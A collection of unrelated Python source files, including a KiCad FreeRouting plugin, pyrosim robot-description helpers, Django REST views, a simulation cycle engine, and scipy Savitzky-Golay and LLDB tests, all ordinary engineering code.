_border_radius = internal_border_radius,
_border_size = internal_border_size,
_border_color = internal_border_color,
_text_color = internal_text_color,
_text_font = internal_text_font
))
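# Illustrative sketch (not part of the original template): PyWindow is normally
# created by the main window and then has widgets added to its layout. The
# parent object and widget below are placeholders.
#
#   window = PyWindow(parent=main_window, bg_color="#2c313c", border_radius=10)
#   window.layout.addWidget(some_widget)
#   window.set_stylesheet(border_color="#568af2")  # override a single property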
|
# ============ FIRST ALGORITHM ============
class Circles(object):
test_img = "cargo1.jpeg"
rescale_size = 0.4
circles_dp = 2.2
circles_minDist = 180
circles_param1 = 75
circles_param2 = 90
circles_minRadius = 10
circles_maxRadius = 500
circle_color = (150, 55, 0)
rectangle_color = (150, 55, 0)
green = (77, 199, 44)
frame_width = 640
frame_height = 480
class TrackCircles(object):
min_blue_HSV = (76, 73, 29)
max_blue_HSV = (134, 255, 255)
min_redx_HSV = (0, 70, 50)
max_redx_HSV = (10, 255, 255)
min_redy_HSV = (160, 33, 45)
max_redy_HSV = (180, 255, 255)
frame_width = 600
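# Illustrative sketch (not part of the original module): the HSV bounds above
# are intended for use with cv2.inRange(); red needs two ranges because its hue
# wraps around 0/180 in OpenCV. cv2 and a captured BGR frame are assumed here.
#
#   hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
#   blue_mask = cv2.inRange(hsv, TrackCircles.min_blue_HSV, TrackCircles.max_blue_HSV)
#   red_mask = cv2.inRange(hsv, TrackCircles.min_redx_HSV, TrackCircles.max_redx_HSV) | \
#              cv2.inRange(hsv, TrackCircles.min_redy_HSV, TrackCircles.max_redy_HSV)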
|
import cryptops
class Crypto:
def __init__(self, key):
self.key = key
def apply(self, msg, func):
return func(self.key, msg)
# Apply external encrypt/decrypt routines from the cryptops module with a stored key
crp = Crypto('secretkey')
encrypted = crp.apply('hello world', cryptops.encrypt)
decrypted = crp.apply(encrypted, cryptops.decrypt)
|
import os
import wx
import wx.aui
import time
import pcbnew
import textwrap
import threading
import subprocess
import configparser
import re
# Remove java offending characters
def search_n_strip(s):
s = re.sub('[Ωµ]', '', s)
return s
#
# FreeRouting round trip invocation:
# * export board.dsn file from pcbnew
# * auto route by invoking FreeRouting.jar
# * import generated board.ses file into pcbnew
#
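# Illustrative sketch (not part of the original plugin): a plugin.ini next to
# this script is expected to provide the keys read in prepare(). The values
# below are placeholders only.
#
#   [java]
#   path = /usr/bin/java
#   [artifact]
#   location = freerouting.jar
#   [module]
#   input_ext = dsn
#   output_ext = ses
#   rules_ext = rules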
class FreeRoutingPlugin(pcbnew.ActionPlugin):
# init in place of constructor
def defaults(self):
self.here_path = os.path.dirname(__file__)
self.name = "FreeRouting"
self.category = "PCB auto routing"
self.description = "FreeRouting for PCB auto routing"
self.show_toolbar_button = True
self.icon_file_name = os.path.join(self.here_path, 'icon.png')
        # Controls KiCAD session file imports (works only in KiCAD nightly or 6)
self.SPECCTRA=False
# setup execution context
def prepare(self):
self.board = pcbnew.GetBoard()
self.path_tuple = os.path.splitext(self.board.GetFileName())
self.board_prefix = self.path_tuple[0]
config = configparser.ConfigParser()
config_path = os.path.join(self.here_path, 'plugin.ini')
config.read(config_path)
self.java_path = config['java']['path']
self.module_file = config['artifact']['location']
self.module_path = os.path.join(self.here_path, self.module_file)
# Set temp filename
#filename = 'freerouting'
filename = os.path.dirname(self.board_prefix) + '/freerouting'
self.module_input = filename + '.' + config['module']['input_ext']
self.module_output = filename + '.' + config['module']['output_ext']
self.module_rules = filename + '.' + config['module']['rules_ext']
self.module_org_output = self.board_prefix + '.' + config['module']['output_ext']
self.module_org_rules = self.board_prefix + '.' + config['module']['rules_ext']
# Remove previous temp files
try:
os.remove(self.module_input)
os.remove(self.module_output)
os.remove(self.module_rules)
except:
pass
# Create DSN file and remove java offending characters
self.bFirstLine = True
self.bEatNextLine = False
with open(filename + '.' + config['module']['input_ext'], "w") as fw, \
open(self.board_prefix + '.' + config['module']['input_ext'],"r") as fr:
for l in fr:
if self.bFirstLine:
fw.writelines('(pcb ' + self.module_input + '\n')
self.bFirstLine = False
elif self.bEatNextLine:
self.bEatNextLine = l.rstrip()[-2:]!="))"
print(l)
print(self.bEatNextLine)
# Optional: remove one or both copper pours before running freerouting
#elif l[:28] == " (plane GND (polygon F.Cu":
# self.bEatNextLine = True
#elif l[:28] == " (plane GND (polygon B.Cu":
# self.bEatNextLine = True
else:
fw.writelines(search_n_strip(l))
fr.close()
fw.close()
# Run freerouting with -s
#self.module_command = [self.java_path, "-jar", self.module_path, "-de", self.module_input, "-s"]
# Run freerouting with -do
self.module_command = [self.java_path, "-jar", self.module_path, "-de", self.module_input, "-do", self.module_output]
if self.SPECCTRA:
if os.path.isfile(self.module_input):
os.remove(self.module_input)
if os.path.isfile(self.module_output):
os.remove(self.module_output)
# export board.dsn file from pcbnew
def RunExport(self):
if self.SPECCTRA:
ok = pcbnew.ExportSpecctraDSN(self.module_input)
if ok and os.path.isfile(self.module_input):
return True
else:
wx_show_error("""
Failed to invoke:
* pcbnew.ExportSpecctraDSN
""")
return False
else:
return True
# auto route by invoking FreeRouting.jar
def RunRouter(self):
dialog = ProcessDialog(None, """
Complete or Terminate FreeRouting:
* to complete, close Java window
* to terminate, press Terminate here
""")
def on_complete():
wx_safe_invoke(dialog.terminate)
invoker = ProcessThread(self.module_command, on_complete)
dialog.Show() # dialog first
invoker.start() # run java process
result = dialog.ShowModal() # block pcbnew here
dialog.Destroy()
try:
if result == dialog.result_button: # return via terminate button
invoker.terminate()
return False
elif result == dialog.result_terminate: # return via dialog.terminate()
if invoker.has_ok():
return True
else:
invoker.show_error()
return False
else:
return False # should not happen
finally:
invoker.join(10) # prevent thread resource leak
# import generated board.ses file into pcbnew
def RunImport(self):
if self.SPECCTRA:
ok = pcbnew.ImportSpecctraSES(self.module_output)
if ok and os.path.isfile(self.module_output):
return True
else:
wx_show_error("""
Failed to invoke:
* pcbnew.ImportSpecctraSES
""")
return False
else:
return True
# invoke chain of dependent methods
def RunSteps(self):
self.prepare()
if not self.RunExport() :
return
if not self.RunRouter() :
return
# Remove temp DSN file
os.remove(self.module_input)
# Rename SES and RULES files
try:
os.rename(self.module_output,
self.module_org_output)
os.rename(self.module_rules,
self.module_org_rules)
except OSError:
pass
wx_safe_invoke(self.RunImport)
# kicad plugin action entry
def Run(self):
if self.SPECCTRA:
if has_pcbnew_api():
self.RunSteps()
else:
wx_show_error("""
Missing required python API:
* pcbnew.ExportSpecctraDSN
* pcbnew.ImportSpecctraSES
---
Try development nightly build:
* http://kicad-pcb.org/download/
""")
else:
self.RunSteps()
# provision gui-thread-safe execution context
# https://git.launchpad.net/kicad/tree/pcbnew/python/kicad_pyshell/__init__.py#n89
if 'phoenix' in wx.PlatformInfo:
if not wx.GetApp():
theApp = wx.App()
else:
theApp = wx.GetApp()
# run function inside gui-thread-safe context; requires wx.App on phoenix
def wx_safe_invoke(function, *args, **kwargs):
wx.CallAfter(function, *args, **kwargs)
# verify required pcbnew api is present
def has_pcbnew_api():
return hasattr(pcbnew, 'ExportSpecctraDSN') and hasattr(pcbnew, 'ImportSpecctraSES')
# message dialog style
wx_caption = "KiCad FreeRouting Plugin"
# display error text to the user
def wx_show_error(text):
message = textwrap.dedent(text)
style = wx.OK | wx.ICON_ERROR
dialog = wx.MessageDialog(None, message=message, caption=wx_caption, style=style)
dialog.ShowModal()
dialog.Destroy()
# prompt the user to cancel a pending action; also allow cancelling programmatically
class ProcessDialog (wx.Dialog):
def __init__(self, parent, text):
message = textwrap.dedent(text)
self.result_button = wx.NewId()
self.result_terminate = wx.NewId()
wx.Dialog.__init__ (self, parent, id=wx.ID_ANY, title=wx_caption, pos=wx.DefaultPosition, size=wx.Size(-1, -1), style=wx.CAPTION)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
sizer = wx.BoxSizer(wx.VERTICAL)
self.text = wx.StaticText(self, wx.ID_ANY, message, wx.DefaultPosition, wx.DefaultSize, 0)
self.text.Wrap(-1)
sizer.Add(self.text, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 10)
self.line = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
sizer.Add(self.line, 0, wx.EXPAND | wx.ALL, 5)
self.bttn = wx.Button(self, wx.ID_ANY, "Terminate", wx.DefaultPosition, wx.DefaultSize, 0)
self.bttn.SetDefault()
sizer.Add(self.bttn, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 5)
self.SetSizer(sizer)
self.Layout()
sizer.Fit(self)
self.Centre(wx.BOTH)
self.bttn.Bind(wx.EVT_BUTTON, self.bttn_on_click)
def __del__(self):
pass
def bttn_on_click(self, event):
self.EndModal(self.result_button)
def terminate(self):
self.EndModal(self.result_terminate)
# cancelable external process invoker with completion notification
class ProcessThread(threading.Thread):
def __init__(self, command, on_complete=None):
self.command = command
self.on_complete = on_complete
threading.Thread.__init__(self)
self.daemon = True
# thread runner
def run(self):
try:
self.process = subprocess.Popen(self.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.stdout, self.stderr = self.process.communicate()
except Exception as error:
self.error = error
finally:
if self.on_complete is not None:
self.on_complete()
def has_ok(self):
return self.has_process() and self.process.returncode == 0
def has_code(self):
return self.has_process() and self.process.returncode != 0
def has_error(self):
return hasattr(self, "error")
def has_process(self):
return hasattr(self, "process")
def terminate(self):
if self.has_process():
self.process.kill()
else:
pass
def show_error(self):
command = " ".join(self.command)
if self.has_error() :
wx_show_error("""
Process failure:
---
command:
%s
---
error:
%s""" % (command, str(self.error)))
elif self.has_code():
wx_show_error("""
Program failure:
---
command:
%s
---
exit code: %d
--- stdout ---
%s
--- stderr ---
%s
""" % (command, self.process.returncode, self.stdout, self.stderr))
else:
pass
# register plugin with kicad backend
FreeRoutingPlugin().register()
|
from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
UpdateAPIView,
DestroyAPIView,
)
from .models import Team
from .serializers import TeamSerializer
from utils.pagination import PaginationPageNumberPagination
class TeamListAPIView(ListAPIView):
"""
Retrieve FIFA 21 Teams
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
pagination_class = PaginationPageNumberPagination
class TeamCreateAPIView(CreateAPIView):
"""
Create a new FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
class TeamUpdateAPIView(UpdateAPIView):
"""
Update a FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
class TeamDestroyAPIView(DestroyAPIView):
"""
Delete a FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
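# A hypothetical urls.py wiring for the views above (module path and route names
# are assumptions, not part of the original project):
#
#     from django.urls import path
#     from .views import (TeamListAPIView, TeamCreateAPIView,
#                         TeamUpdateAPIView, TeamDestroyAPIView)
#
#     urlpatterns = [
#         path('teams/', TeamListAPIView.as_view(), name='team-list'),
#         path('teams/create/', TeamCreateAPIView.as_view(), name='team-create'),
#         path('teams/<int:pk>/update/', TeamUpdateAPIView.as_view(), name='team-update'),
#         path('teams/<int:pk>/delete/', TeamDestroyAPIView.as_view(), name='team-delete'),
#     ]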
|
/home/runner/.cache/pip/pool/b7/df/1e/7980259571f5a43b5ac0c36215dfc4b1485986d14af13b40a821ae930f
|
import pybullet as p
from pyrosim.nndf import NNDF
from pyrosim.linksdf import LINK_SDF
from pyrosim.linkurdf import LINK_URDF
from pyrosim.model import MODEL
from pyrosim.sdf import SDF
from pyrosim.urdf import URDF
from pyrosim.joint import JOINT
SDF_FILETYPE = 0
URDF_FILETYPE = 1
NNDF_FILETYPE = 2
# global availableLinkIndex
# global linkNamesToIndices
def End():
if filetype == SDF_FILETYPE:
sdf.Save_End_Tag(f)
elif filetype == NNDF_FILETYPE:
nndf.Save_End_Tag(f)
else:
urdf.Save_End_Tag(f)
f.close()
def End_Model():
model.Save_End_Tag(f)
def Get_Touch_Sensor_Value_For_Link(linkName):
touchValue = -1.0
desiredLinkIndex = linkNamesToIndices[linkName]
pts = p.getContactPoints()
for pt in pts:
linkIndex = pt[4]
if ( linkIndex == desiredLinkIndex ):
touchValue = 1.0
return touchValue
def Prepare_Link_Dictionary(urdfFileName):
global linkNamesToIndices
linkNamesToIndices = {}
linkIndex = -1
f = open(urdfFileName,"r")
for line in f.readlines():
if "link name" in line:
line = line.split('"')
linkName = line[1]
linkNamesToIndices[linkName] = linkIndex
linkIndex = linkIndex + 1
f.close()
def Prepare_Joint_Dictionary(urdfFileName):
global jointNamesToIndices
jointNamesToIndices = {}
jointIndex = 0
f = open(urdfFileName,"r")
for line in f.readlines():
if "joint name" in line:
line = line.split('"')
jointName = line[1]
jointNamesToIndices[jointName] = jointIndex
jointIndex = jointIndex + 1
f.close()
def Prepare_To_Simulate(urdfFileName):
Prepare_Link_Dictionary(urdfFileName)
Prepare_Joint_Dictionary(urdfFileName)
def Send_Cube(name="default",pos=[0,0,0],size=[1,1,1]):
global availableLinkIndex
if filetype == SDF_FILETYPE:
Start_Model(name,pos)
link = LINK_SDF(name,pos,size)
else:
link = LINK_URDF(name,pos,size)
link.Save(f)
if filetype == SDF_FILETYPE:
End_Model()
linkNamesToIndices[name] = availableLinkIndex
availableLinkIndex = availableLinkIndex + 1
def Send_Joint(name,parent,child,type,position,jointAxis):
joint = JOINT(name,parent,child,type,position)
#print(jointAxis,"printing\n")
joint.Save(f,jointAxis)
def Send_Motor_Neuron(name,jointName):
f.write(' <neuron name = "' + str(name) + '" type = "motor" jointName = "' + jointName + '" />\n')
def Send_Sensor_Neuron(name,linkName):
f.write(' <neuron name = "' + str(name) + '" type = "sensor" linkName = "' + linkName + '" />\n')
def Send_Synapse( sourceNeuronName , targetNeuronName , weight ):
f.write(' <synapse sourceNeuronName = "' + str(sourceNeuronName) + '" targetNeuronName = "' + str(targetNeuronName) + '" weight = "' + str(weight) + '" />\n')
def Set_Motor_For_Joint(bodyIndex,jointName,controlMode,targetPosition,maxForce):
p.setJointMotorControl2(
bodyIndex = bodyIndex,
jointIndex = jointNamesToIndices[jointName],
controlMode = controlMode,
targetPosition = targetPosition,
force = maxForce)
def Start_NeuralNetwork(filename):
global filetype
filetype = NNDF_FILETYPE
global f
f = open(filename,"w")
global nndf
nndf = NNDF()
nndf.Save_Start_Tag(f)
def Start_SDF(filename):
global availableLinkIndex
availableLinkIndex = -1
global linkNamesToIndices
linkNamesToIndices = {}
global filetype
filetype = SDF_FILETYPE
global f
f = open(filename,"w")
global sdf
sdf = SDF()
sdf.Save_Start_Tag(f)
def Start_URDF(filename):
global availableLinkIndex
availableLinkIndex = -1
global linkNamesToIndices
linkNamesToIndices = {}
global filetype
filetype = URDF_FILETYPE
global f
f = open(filename,"w")
global urdf
urdf = URDF()
urdf.Save_Start_Tag(f)
def Start_Model(modelName,pos):
global model
model = MODEL(modelName,pos)
model.Save_Start_Tag(f)
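# A minimal usage sketch for the helpers above (assuming this module is importable
# as pyrosim; the file name, link names, and geometry are hypothetical):
#
#     import pyrosim
#     pyrosim.Start_URDF("body.urdf")
#     pyrosim.Send_Cube(name="Torso", pos=[0, 0, 1.5], size=[1, 1, 1])
#     pyrosim.Send_Joint(name="Torso_Leg", parent="Torso", child="Leg",
#                        type="revolute", position=[0, 0, 1.0], jointAxis="1 0 0")
#     pyrosim.Send_Cube(name="Leg", pos=[0, 0, -0.5], size=[0.2, 0.2, 1])
#     pyrosim.End()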
|
from synergine.lib.process.processmanager import KeepedAliveProcessManager
from synergine.core.cycle.PipePackage import PipePackage
from synergine.core.simulation.EventManager import EventManager
from synergine.core.Signals import Signals
from synergine.synergy.event.exception.ActionAborted import ActionAborted
class CycleCalculator():
"""
Run cycles of simulation
"""
ACTION_RUNNED = 'signal.action_runned'
def __init__(self, context, synergy_manager, config, force_main_process=False):
self._context = context
self._synergy_manager = synergy_manager
self._event_manager = EventManager(self._synergy_manager)
self._event_manager.refresh()
self._force_main_process = force_main_process
self._config = config
# TODO: Get the number of processes from the OS
self._process_manager = KeepedAliveProcessManager(nb_process=self._config.get('engine.processes', 2),
target=self._process_compute)
self._cycle = 0
self._current_cycle_actions_done = []
def get_cycle(self):
return self._cycle
def compute(self):
self._cycle += 1
#print('cycle: ', self._cycle)
self._current_cycle_actions_done = []
self._compute_events()
self._compute_simulations_end_cycle()
return self._current_cycle_actions_done
def _compute_events(self):
for step_key, mechanisms in enumerate(self._event_manager.get_mechanisms_steps()):
actions = self._get_computeds_objects(step_key)
self._apply_cycle_actions(actions)
self._apply_actions(actions)
def _get_computeds_objects(self, step_key):
pipe_package = self._get_pipe_package_for_collection(step_key)
if not self._force_main_process:
computeds_objects = self._process_manager.get_their_work(pipe_package)
else:
pipe_package.setCountProcess(1)
pipe_package.setCurrentProcessId(0)
computeds_objects = self._process_compute(pipe_package)
return computeds_objects
def _get_pipe_package_for_collection(self, step_key):
pipe_package = PipePackage()
pipe_package.set_step_key(step_key)
self._context.set_cycle(self._cycle)
# TODO: 1: Only the metas need to be carried around
# TODO: 2: Only transport the diff of the metas for the computations across the network
pipe_package.set_context(self._context)
# TODO: The return package contains the instantiated actions. The package could be lightened by returning something like:
# {action_id: ((obj_id, obj_id, ...), parameters)}
# import sys
# import pickle
# size = sys.getsizeof(pickle.dumps(pipe_package))
# print(size)
return pipe_package
def _process_compute(self, pipe_package):
"""
From this point on we are running in a worker process: only use the metas (object ids, states)
:param pipe_package:
:return:
"""
context = pipe_package.get_context()
step_key = pipe_package.get_step_key()
actions = []
for mechanism in self._event_manager.get_mechanisms_steps()[step_key]:
mechanism_actions = mechanism.run(context)
for mechanism_action in mechanism_actions:
actions.append(mechanism_action)
return actions
def _apply_cycle_actions(self, actions):
"""
Run the cycle_pre_run hook once per action class present in this cycle.
:param actions:
:return:
"""
executed_cycle_classes = []
for action in actions:
if type(action) not in executed_cycle_classes:
action.cycle_pre_run(self._context, self._synergy_manager)
executed_cycle_classes.append(type(action))
def _apply_actions(self, actions):
"""
Run every action and emit its signal; actions that raise ActionAborted are skipped.
:param actions: list of actions
:return:
"""
for action in actions:
obj = self._synergy_manager.get_map().get_object(action.get_object_id())
try:
action.run(obj, self._context, self._synergy_manager)
Signals.signal(action.__class__).send(obj=obj, context=self._context)
self._current_cycle_actions_done.append(action)
except ActionAborted:
pass
def _compute_simulations_end_cycle(self):
for simulation in self._synergy_manager.get_simulations():
simulation.end_cycle(self._context)
def end(self):
self._process_manager.stop()
|
import numpy as np
from numpy.testing import (assert_allclose, assert_equal,
assert_almost_equal, assert_array_equal,
assert_array_almost_equal)
from scipy.ndimage import convolve1d
from scipy.signal import savgol_coeffs, savgol_filter
from scipy.signal._savitzky_golay import _polyder
def check_polyder(p, m, expected):
dp = _polyder(p, m)
assert_array_equal(dp, expected)
def test_polyder():
cases = [
([5], 0, [5]),
([5], 1, [0]),
([3, 2, 1], 0, [3, 2, 1]),
([3, 2, 1], 1, [6, 2]),
([3, 2, 1], 2, [6]),
([3, 2, 1], 3, [0]),
([[3, 2, 1], [5, 6, 7]], 0, [[3, 2, 1], [5, 6, 7]]),
([[3, 2, 1], [5, 6, 7]], 1, [[6, 2], [10, 6]]),
([[3, 2, 1], [5, 6, 7]], 2, [[6], [10]]),
([[3, 2, 1], [5, 6, 7]], 3, [[0], [0]]),
]
for p, m, expected in cases:
check_polyder(np.array(p).T, m, np.array(expected).T)
#--------------------------------------------------------------------
# savgol_coeffs tests
#--------------------------------------------------------------------
def alt_sg_coeffs(window_length, polyorder, pos):
"""This is an alternative implementation of the SG coefficients.
It uses numpy.polyfit and numpy.polyval. The results should be
equivalent to those of savgol_coeffs(), but this implementation
is slower.
window_length should be odd.
"""
if pos is None:
pos = window_length // 2
t = np.arange(window_length)
unit = (t == pos).astype(int)
h = np.polyval(np.polyfit(t, unit, polyorder), t)
return h
def test_sg_coeffs_trivial():
# Test a trivial case of savgol_coeffs: polyorder = window_length - 1
h = savgol_coeffs(1, 0)
assert_allclose(h, [1])
h = savgol_coeffs(3, 2)
assert_allclose(h, [0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4)
assert_allclose(h, [0, 0, 1, 0, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1)
assert_allclose(h, [0, 0, 0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1, use='dot')
assert_allclose(h, [0, 1, 0, 0, 0], atol=1e-10)
def compare_coeffs_to_alt(window_length, order):
# For the given window_length and order, compare the results
# of savgol_coeffs and alt_sg_coeffs for pos from 0 to window_length - 1.
# Also include pos=None.
for pos in [None] + list(range(window_length)):
h1 = savgol_coeffs(window_length, order, pos=pos, use='dot')
h2 = alt_sg_coeffs(window_length, order, pos=pos)
assert_allclose(h1, h2, atol=1e-10,
err_msg=("window_length = %d, order = %d, pos = %s" %
(window_length, order, pos)))
def test_sg_coeffs_compare():
# Compare savgol_coeffs() to alt_sg_coeffs().
for window_length in range(1, 8, 2):
for order in range(window_length):
compare_coeffs_to_alt(window_length, order)
def test_sg_coeffs_exact():
polyorder = 4
window_length = 9
halflen = window_length // 2
x = np.linspace(0, 21, 43)
delta = x[1] - x[0]
# The data is a cubic polynomial. We'll use an order 4
# SG filter, so the filtered values should equal the input data
# (except within half window_length of the edges).
y = 0.5 * x ** 3 - x
h = savgol_coeffs(window_length, polyorder)
y0 = convolve1d(y, h)
assert_allclose(y0[halflen:-halflen], y[halflen:-halflen])
# Check the same input, but use deriv=1. dy is the exact result.
dy = 1.5 * x ** 2 - 1
h = savgol_coeffs(window_length, polyorder, deriv=1, delta=delta)
y1 = convolve1d(y, h)
assert_allclose(y1[halflen:-halflen], dy[halflen:-halflen])
# Check the same input, but use deriv=2. d2y is the exact result.
d2y = 3.0 * x
h = savgol_coeffs(window_length, polyorder, deriv=2, delta=delta)
y2 = convolve1d(y, h)
assert_allclose(y2[halflen:-halflen], d2y[halflen:-halflen])
def test_sg_coeffs_deriv():
# The data in `x` is a sampled parabola, so using savgol_coeffs with an
# order 2 or higher polynomial should give exact results.
i = np.array([-2.0, 0.0, 2.0, 4.0, 6.0])
x = i ** 2 / 4
dx = i / 2
d2x = np.full_like(i, 0.5)
for pos in range(x.size):
coeffs0 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot')
assert_allclose(coeffs0.dot(x), x[pos], atol=1e-10)
coeffs1 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=1)
assert_allclose(coeffs1.dot(x), dx[pos], atol=1e-10)
coeffs2 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=2)
assert_allclose(coeffs2.dot(x), d2x[pos], atol=1e-10)
def test_sg_coeffs_deriv_gt_polyorder():
"""
If deriv > polyorder, the coefficients should be all 0.
This is a regression test for a bug where, e.g.,
savgol_coeffs(5, polyorder=1, deriv=2)
raised an error.
"""
coeffs = savgol_coeffs(5, polyorder=1, deriv=2)
assert_array_equal(coeffs, np.zeros(5))
coeffs = savgol_coeffs(7, polyorder=4, deriv=6)
assert_array_equal(coeffs, np.zeros(7))
def test_sg_coeffs_large():
# Test that for large values of window_length and polyorder the array of
# coefficients returned is symmetric. The aim is to ensure that
# no potential numeric overflow occurs.
coeffs0 = savgol_coeffs(31, 9)
assert_array_almost_equal(coeffs0, coeffs0[::-1])
coeffs1 = savgol_coeffs(31, 9, deriv=1)
assert_array_almost_equal(coeffs1, -coeffs1[::-1])
# --------------------------------------------------------------------
# savgol_coeffs tests for even window length
# --------------------------------------------------------------------
def test_sg_coeffs_even_window_length():
# Simple case - deriv=0, polyorder=0, 1
window_lengths = [4, 6, 8, 10, 12, 14, 16]
for length in window_lengths:
h_p_d = savgol_coeffs(length, 0, 0)
assert_allclose(h_p_d, 1/length)
# Verify with closed forms
# deriv=1, polyorder=1, 2
def h_p_d_closed_form_1(k, m):
return 6*(k - 0.5)/((2*m + 1)*m*(2*m - 1))
# deriv=2, polyorder=2
def h_p_d_closed_form_2(k, m):
numer = 15*(-4*m**2 + 1 + 12*(k - 0.5)**2)
denom = 4*(2*m + 1)*(m + 1)*m*(m - 1)*(2*m - 1)
return numer/denom
for length in window_lengths:
m = length//2
expected_output = [h_p_d_closed_form_1(k, m)
for k in range(-m + 1, m + 1)][::-1]
actual_output = savgol_coeffs(length, 1, 1)
assert_allclose(expected_output, actual_output)
actual_output = savgol_coeffs(length, 2, 1)
assert_allclose(expected_output, actual_output)
expected_output = [h_p_d_closed_form_2(k, m)
for k in range(-m + 1, m + 1)][::-1]
actual_output = savgol_coeffs(length, 2, 2)
assert_allclose(expected_output, actual_output)
actual_output = savgol_coeffs(length, 3, 2)
assert_allclose(expected_output, actual_output)
#--------------------------------------------------------------------
# savgol_filter tests
#--------------------------------------------------------------------
def test_sg_filter_trivial():
""" Test some trivial edge cases for savgol_filter()."""
x = np.array([1.0])
y = savgol_filter(x, 1, 0)
assert_equal(y, [1.0])
# Input is a single value. With a window length of 3 and polyorder 1,
# the value in y is from the straight-line fit of (-1,0), (0,3) and
# (1, 0) at 0. This is just the average of the three values, hence 1.0.
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_almost_equal(y, [1.0], decimal=15)
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='nearest')
assert_almost_equal(y, [3.0], decimal=15)
x = np.array([1.0] * 3)
y = savgol_filter(x, 3, 1, mode='wrap')
assert_almost_equal(y, [1.0, 1.0, 1.0], decimal=15)
def test_sg_filter_basic():
# Some basic test cases for savgol_filter().
x = np.array([1.0, 2.0, 1.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, [1.0, 4.0 / 3, 1.0])
y = savgol_filter(x, 3, 1, mode='mirror')
assert_allclose(y, [5.0 / 3, 4.0 / 3, 5.0 / 3])
y = savgol_filter(x, 3, 1, mode='wrap')
assert_allclose(y, [4.0 / 3, 4.0 / 3, 4.0 / 3])
def test_sg_filter_2d():
x = np.array([[1.0, 2.0, 1.0],
[2.0, 4.0, 2.0]])
expected = np.array([[1.0, 4.0 / 3, 1.0],
[2.0, 8.0 / 3, 2.0]])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, expected)
y = savgol_filter(x.T, 3, 1, mode='constant', axis=0)
assert_allclose(y, expected.T)
def test_sg_filter_interp_edges():
# Another test with low degree polynomial data, for which we can easily
# give the exact results. In this test, we use mode='interp', so
# savgol_filter should match the exact solution for the entire data set,
# including the edges.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
# Polynomial test data.
x = np.array([t,
3 * t ** 2,
t ** 3 - t])
dx = np.array([np.ones_like(t),
6 * t,
3 * t ** 2 - 1.0])
d2x = np.array([np.zeros_like(t),
np.full_like(t, 6),
6 * t])
window_length = 7
y = savgol_filter(x, window_length, 3, axis=-1, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
# Transpose everything, and test again with axis=0.
x = x.T
dx = dx.T
d2x = d2x.T
y = savgol_filter(x, window_length, 3, axis=0, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
def test_sg_filter_interp_edges_3d():
# Test mode='interp' with a 3-D array.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
x1 = np.array([t, -t])
x2 = np.array([t ** 2, 3 * t ** 2 + 5])
x3 = np.array([t ** 3, 2 * t ** 3 + t ** 2 - 0.5 * t])
dx1 = np.array([np.ones_like(t), -np.ones_like(t)])
dx2 = np.array([2 * t, 6 * t])
dx3 = np.array([3 * t ** 2, 6 * t ** 2 + 2 * t - 0.5])
# z has shape (3, 2, 21)
z = np.array([x1, x2, x3])
dz = np.array([dx1, dx2, dx3])
y = savgol_filter(z, 7, 3, axis=-1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=-1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (3, 21, 2)
z = np.array([x1.T, x2.T, x3.T])
dz = np.array([dx1.T, dx2.T, dx3.T])
y = savgol_filter(z, 7, 3, axis=1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (21, 3, 2)
z = z.swapaxes(0, 1).copy()
dz = dz.swapaxes(0, 1).copy()
y = savgol_filter(z, 7, 3, axis=0, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=0, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
|
import unittest2
from lldbsuite.test.decorators import *
from lldbsuite.test.concurrent_base import ConcurrentEventsBase
from lldbsuite.test.lldbtest import TestBase
@skipIfWindows
class ConcurrentCrashWithSignal(ConcurrentEventsBase):
mydir = ConcurrentEventsBase.compute_mydir(__file__)
# Atomic sequences are not supported yet for MIPS in LLDB.
@skipIf(triple='^mips')
def test(self):
""" Test a thread that crashes while another thread generates a signal."""
self.build(dictionary=self.getBuildFlags())
self.do_thread_actions(num_crash_threads=1, num_signal_threads=1)
|